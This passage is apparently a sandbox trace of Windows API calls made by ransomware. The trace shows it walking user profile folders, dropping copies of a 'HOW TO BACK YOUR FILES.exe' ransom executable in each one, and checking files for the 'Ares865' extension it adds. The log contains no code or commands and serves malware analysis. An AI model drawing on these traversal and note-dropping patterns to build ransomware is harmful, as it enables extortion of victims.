CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.449] GetLastError () returned 0x0 [0042.450] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.450] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.450] CloseHandle (hObject=0x118) returned 1 [0042.450] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.450] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.450] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.450] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.450] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.450] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media" [0042.450] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc010 | out: hHeap=0x2b0000) returned 1 [0042.450] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2440 | out: hHeap=0x2b0000) returned 1 [0042.450] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media") returned 94 [0042.450] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media" [0042.450] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.450] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\windows media\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.451] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.451] GetLastError () returned 0x0 [0042.451] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.451] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.451] CloseHandle (hObject=0x118) returned 1 [0042.451] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.451] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.451] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.451] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.451] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.451] lstrcpyW (in: lpString1=0x2e2e91e, lpString2="12.0" | out: lpString1="12.0") returned="12.0" [0042.451] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2440 [0042.451] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc8) returned 0x2cc010 [0042.451] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2448 | out: ListHead=0x2e77d0, ListEntry=0x2d2448) returned 0x2d2428 [0042.451] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a71db00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0042.452] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0042.452] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a71db00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0042.452] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.452] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2448 [0042.452] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" [0042.452] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc010 | out: hHeap=0x2b0000) returned 1 [0042.452] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2440 | out: hHeap=0x2b0000) returned 1 [0042.452] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned 99 [0042.452] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" [0042.452] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.452] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\windows media\\12.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.452] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.452] GetLastError () returned 0x0 [0042.452] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.452] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.453] CloseHandle (hObject=0x118) returned 1 [0042.453] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.453] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.453] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a7b6080, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a7b6080, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.453] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.453] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.453] lstrcpyW (in: lpString1=0x2e2e928, lpString2="WMSDKNS.DTD" | out: lpString1="WMSDKNS.DTD") returned="WMSDKNS.DTD" [0042.453] lstrlenW (lpString="WMSDKNS.DTD") returned 11 [0042.453] lstrlenW (lpString="Ares865") returned 7 [0042.453] lstrcmpiW (lpString1="KNS.DTD", lpString2="Ares865") returned 1 [0042.453] lstrcpyW (in: lpString1=0x2e2e928, lpString2="WMSDKNS.XML.Ares865" | out: lpString1="WMSDKNS.XML.Ares865") returned="WMSDKNS.XML.Ares865" [0042.453] lstrlenW (lpString="WMSDKNS.XML.Ares865") returned 19 [0042.453] lstrlenW (lpString="Ares865") returned 7 [0042.453] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0042.453] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4a7b6080, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2ad0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WMSDKNS.XML.Ares865", cAlternateFileName="WMSDKN~1.ARE")) returned 0 [0042.453] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.453] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2428 [0042.453] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0042.453] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbf48 | out: hHeap=0x2b0000) returned 1 [0042.453] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0042.454] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned 93 [0042.454] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0042.454] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.454] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\windows mail\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.454] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.454] GetLastError () returned 0x0 [0042.454] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.454] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.454] CloseHandle (hObject=0x118) returned 1 [0042.454] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.455] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.455] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a8284a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a8284a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.455] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.455] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.455] lstrcpyW (in: lpString1=0x2e2e91c, lpString2="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" | out: lpString1="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" [0042.455] lstrlenW (lpString="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount") returned 55 [0042.455] lstrlenW (lpString="Ares865") returned 7 [0042.455] lstrcmpiW (lpString1="account", lpString2="Ares865") returned -1 [0042.455] lstrcpyW (in: lpString1=0x2e2e91c, lpString2="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" | out: lpString1="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" [0042.455] lstrlenW (lpString="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned 55 [0042.455] lstrlenW (lpString="Ares865") returned 7 [0042.455] lstrcmpiW (lpString1="account", lpString2="Ares865") returned -1 [0042.455] lstrcpyW (in: lpString1=0x2e2e91c, lpString2="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" | out: lpString1="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount") returned="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount" [0042.455] lstrlenW (lpString="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount") returned 55 [0042.455] lstrlenW (lpString="Ares865") returned 7 [0042.455] lstrcmpiW (lpString1="account", lpString2="Ares865") returned -1 [0042.455] lstrcpyW (in: lpString1=0x2e2e91c, lpString2="Backup" | out: lpString1="Backup") returned="Backup" [0042.455] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2420 [0042.455] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xca) returned 0x2d40a8 [0042.455] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2428 | out: ListHead=0x2e77d0, ListEntry=0x2d2428) returned 0x2d2408 [0042.455] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64c3520, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x64c3520, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd7bc3a13, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="edb.chk", cAlternateFileName="")) returned 1 [0042.455] lstrcmpiW (lpString1="edb.chk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.456] lstrcmpiW (lpString1="edb.chk", lpString2="aoldtz.exe") returned 1 [0042.456] lstrcpyW (in: lpString1=0x2e2e91c, lpString2="edb.chk" | out: lpString1="edb.chk") returned="edb.chk" [0042.456] lstrlenW (lpString="edb.chk") returned 7 [0042.456] lstrlenW (lpString="Ares865") returned 7 [0042.456] lstrcpyW (in: lpString1=0x2e2e91c, lpString2="edb.log" | out: lpString1="edb.log") returned="edb.log" [0042.456] lstrlenW (lpString="edb.log") returned 7 [0042.456] lstrlenW (lpString="Ares865") returned 7 [0042.456] lstrcpyW (in: lpString1=0x2e2e91c, lpString2="edb00001.log" | out: lpString1="edb00001.log") returned="edb00001.log" [0042.456] lstrlenW (lpString="edb00001.log") returned 12 [0042.456] lstrlenW (lpString="Ares865") returned 7 [0042.456] lstrcmpiW (lpString1="001.log", lpString2="Ares865") returned -1 [0042.456] lstrcpyW (in: lpString1=0x2e2e91c, lpString2="edbres00001.jrs" | out: lpString1="edbres00001.jrs") returned="edbres00001.jrs" [0042.456] lstrlenW (lpString="edbres00001.jrs") returned 15 [0042.456] lstrlenW (lpString="Ares865") returned 7 [0042.456] lstrcmpiW (lpString1="001.jrs", lpString2="Ares865") returned -1 [0042.456] lstrcpyW (in: lpString1=0x2e2e91c, lpString2="edbres00002.jrs" | out: lpString1="edbres00002.jrs") returned="edbres00002.jrs" [0042.456] lstrlenW (lpString="edbres00002.jrs") returned 15 [0042.456] lstrlenW (lpString="Ares865") returned 7 [0042.456] lstrcmpiW (lpString1="002.jrs", lpString2="Ares865") returned -1 [0042.456] lstrcpyW (in: lpString1=0x2e2e91c, lpString2="oeold.xml.Ares865" | out: lpString1="oeold.xml.Ares865") returned="oeold.xml.Ares865" [0042.456] lstrlenW (lpString="oeold.xml.Ares865") returned 17 [0042.456] lstrlenW (lpString="Ares865") returned 7 [0042.456] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0042.456] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a874760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a874760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0042.456] lstrcmpiW (lpString1="Stationery", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.456] lstrcmpiW (lpString1="Stationery", lpString2="aoldtz.exe") returned 1 [0042.457] lstrcpyW (in: lpString1=0x2e2e91c, lpString2="Stationery" | out: lpString1="Stationery") returned="Stationery" [0042.457] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2440 [0042.457] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xd2) returned 0x2cbf48 [0042.457] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2448 | out: ListHead=0x2e77d0, ListEntry=0x2d2448) returned 0x2d2428 [0042.457] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd7b05332, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x204000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WindowsMail.MSMessageStore", cAlternateFileName="WINDOW~1.MSM")) returned 1 [0042.457] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0042.457] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="aoldtz.exe") returned 1 [0042.457] lstrcpyW (in: lpString1=0x2e2e91c, lpString2="WindowsMail.MSMessageStore" | out: lpString1="WindowsMail.MSMessageStore") returned="WindowsMail.MSMessageStore" [0042.457] lstrlenW (lpString="WindowsMail.MSMessageStore") returned 26 [0042.457] lstrlenW (lpString="Ares865") returned 7 [0042.457] lstrcmpiW (lpString1="geStore", lpString2="Ares865") returned 1 [0042.457] lstrcpyW (in: lpString1=0x2e2e91c, lpString2="WindowsMail.pat" | out: lpString1="WindowsMail.pat") returned="WindowsMail.pat" [0042.457] lstrlenW (lpString="WindowsMail.pat") returned 15 [0042.457] lstrlenW (lpString="Ares865") returned 7 [0042.457] lstrcmpiW (lpString1="ail.pat", lpString2="Ares865") returned -1 [0042.458] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery" [0042.458] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbf48 | out: hHeap=0x2b0000) returned 1 [0042.458] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2440 | out: hHeap=0x2b0000) returned 1 [0042.458] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery") returned 104 [0042.458] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery" [0042.458] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.458] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\windows mail\\stationery\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.459] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.459] GetLastError () returned 0x0 [0042.459] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.459] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.459] CloseHandle (hObject=0x118) returned 1 [0042.459] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.459] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.459] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a874760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a874760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.459] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.459] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.459] lstrcpyW (in: lpString1=0x2e2e932, lpString2="Bears.htm" | out: lpString1="Bears.htm") returned="Bears.htm" [0042.460] lstrlenW (lpString="Bears.htm") returned 9 [0042.460] lstrlenW (lpString="Ares865") returned 7 [0042.460] lstrcmpiW (lpString1="ars.htm", lpString2="Ares865") returned 1 [0042.460] lstrcpyW (in: lpString1=0x2e2e932, lpString2="Bears.jpg" | out: lpString1="Bears.jpg") returned="Bears.jpg" [0042.460] lstrlenW (lpString="Bears.jpg") returned 9 [0042.460] lstrlenW (lpString="Ares865") returned 7 [0042.460] lstrcmpiW (lpString1="ars.jpg", lpString2="Ares865") returned 1 [0042.460] lstrcpyW (in: lpString1=0x2e2e932, lpString2="Desktop.ini" | out: lpString1="Desktop.ini") 